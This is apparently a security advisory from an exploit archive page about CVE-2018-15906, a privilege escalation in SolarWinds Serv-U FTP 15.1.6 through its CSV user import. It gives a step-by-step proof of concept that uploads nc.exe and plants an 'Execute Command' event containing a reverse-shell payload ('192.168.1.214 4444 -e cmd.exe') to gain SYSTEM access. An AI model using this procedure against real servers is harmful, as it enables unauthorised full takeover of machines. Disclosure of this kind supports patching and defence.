SolarWinds Serv-U FTP 15.1.6 Privilege Escalation

2019.02.02
Credit: Chris Moberly
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

CVE: CVE-2018-15906 Attack type: Remote, authenticated Discovered by: Chris Moberly @ The Missing Link Security Operating Systems: Verified on Win10 and Win2016 Vulnerable version: Tested on 15.1.6 (current as of August 2018). Fixed in: Serv-U 15.1.6 Hotfix 2 # Description SolarWinds Serv-U FTP Server is vulnerable to privilege escalation from remote authenticated users by leveraging the CSV user import function. This leads to obtaining remote code execution under the context of the Windows SYSTEM account in a default installation. # Additonal Information ## Overview Privilege escalation is possible from an authenticated user who is a member of the "Domain Administrators" group to a user with full administrative rights (System Administrator), permitting remote command execution. Serv-U allows users with the "System Administrator" role to configure events which trigger tasks, such as running executables. Lower-level administrators such as "Domain Administrators" are denied this option. When authenticated as one of these lower-level administrators, this control can be bypassed by using the built-in user "Import" function to load a CSV file with the event already defined. As this tool also permits file uploads, an authenticated attacker can upload something like nc.exe and define a trigger to execute a reverse-shell connection to a remote box. The application installs as SYSTEM by default, leading to a complete compromise of the machine. This method may also bypass other restrictions, such as granting users execute permissions on directories, elevating their administrative privileges, and granting them access to alternative UIs. ## Exploit POC Walkthrough Begin with a clean install of the Serv-U trial version. Log in using the "Management Console" application on the Windows server itself. Create the following two users in a domain called "test": - lowpriv (no admin privileges, only read access on home directory) - domadmin (domain administrator, read/write on home directory C:\) Next, log in to the web interface as domadmin. In the file area (/Web%20Client/ListDir.htm), upload an executable to the home directory. I used "nc.exe" for its reverse-shell capabilities, but really anything will work for a POC. Back in the management area (/?Command=Login) go to the test domain and select "Users". Edit the lowpriv user. Go to the "Events" tab and click "Add". Try to set one up with "Action" set to "Execute Command" and click "Save" You will receive a permissions error, as this is not allowed. Still in the web UI, under Domain Users click the "Export" button to save the CSV. Make some changes to this CSV: Duplicate the user "lowpriv" in a new row called "lowpriv2". Find the CSV column titled "SUEvent" and place the following test in its section for this new user: 1,10,EventID,200,EventName,Event 01,Action,2,Data1,192.168.1.214 4444 -e cmd.exe,ExeFilePath,/nc.exe (that is executing NC to connect back an attacking machine, which has a listener running on 192.168.1.214 on port 4444. Adjust accordingly.) After saving the changes, import the CSV back in while logged in as domadmin. You should see a message that 1 of 3 users have been imported. Now, click on "Edit" for user lowpriv2. Go to the "Events" tab and see that you now have the "Execute Command" event that you do should not have the permission to create. Highlight the task and click "Test Event" and it will execute. Remove the event if this is a production environment. You now have a shell with SYSTEM permissions on your attacking box, giving you complete control of the server. From here, you can compromise the box or manually edit the Serv-U archive files to create full admin accounts.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top